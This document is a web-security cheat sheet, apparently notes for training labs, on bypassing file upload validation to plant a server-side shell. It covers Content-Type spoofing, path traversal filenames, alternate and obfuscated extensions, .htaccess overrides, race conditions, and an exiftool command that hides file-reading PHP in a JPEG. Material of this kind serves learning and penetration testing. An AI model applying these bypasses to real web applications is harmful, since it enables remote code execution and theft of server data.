File upload Attacks

• Maybe the application does not validate the file extension at all and allows uploading php, js, python, java files?

• Is the application validating the file type based upon Content-Type header? here we can upload filename as shell.php but set Content-Type as image/png.

• The application might be configured to deny execution of scripts on uploaded directory but using path traversal sequence the file can be uploaded to other locations eg:

Content-Disposition: form-data; name="avatar"; filename="../../resources/images/test.php"
Content-Type: image/png

• If dangerous file extension are blacklisted like .php lesser known file extension such as .php5, .phtml, .shtml, etc can be used.

Note: Before a server executes a php file requested by the client the following configuration should be made on /etc/apache2/apache2.conf

LoadModule php_module /usr/lib/apache2/modules/libphp.so
AddType application/x-httpd-php .php

• Apache servers load directory specific configurtion using .htaccess files. SImilarly IIS servers can have directory specific configuration via web.config file.

• If the application only accepts text files then we may be able to overwrite the directory or server's configuration using .htaccess file with th following contents

AddType application/x-httpd-php .meow

This maps .meow extension to application/x-httpd-php MIME type thus uploading a php shell with .meow extension results into code execution.

• Maybe upload file extension .php as .PHP or .pHp? .js as .JS?

• Maybe upload exploit.php.jpg

• Upload file with trailing characters like whitespace, dots, etc exploit.php.

• Try using the URL encoding (or double URL encoding) for dots, forward slashes, and backward slashes. If the value isn't decoded when validating the file extension, but is later decoded server-side, this can also allow you to upload malicious files that would otherwise be blocked: exploit%2Ephp

• try exploit.asp;.jpg or exploit.asp%00.jpg

• If it strips dangerous extensions try exploit.p.phphp or exploit.j.spjsp

• Instead of implicitly trusting the content type more secure servers try to verify that the contents of the file match actually match that is expected through bytes in header or footer,image dimension, example, JPEG files always begin with the bytes FF D8 FF. Here, Using special tools, such as ExifTool, it can be trivial to create a polyglot JPEG file containing malicious code within its metadata. exiftool -Comment="<?php echo 'START '.file_get_contents('/home/carlos/secret'). 'END'; ?>" meow.jpg -o meow.php

• Maybe the uploaded file is first moved to a temporary directory and checked for extensions, filename, dimensions, etc but we may be able to induce race conditions as soon as the file is uploaded requesting the uploaded path, eg: the uploaded files are in /files/avatar/test.png and it moves this file to a temporary directory eg: /tmp/test.png and performs checks and if success it uploads to specific location else it removes the file, using intruder to contnuously send the file upload request uploading shell.php and using repeater performing get request on GET /files/avatar/shell.php here the shell can be executed before the file is moved to temporary directory since shell upload request is running continuously and and we are requesting the shell from repeater it triggers race condition.

• If html or svg file are allowed we can trigger xss

• IF the server accepts xls, doc, xlsx files maybe XXE?

• Maybe files can be uploaded via PUT method?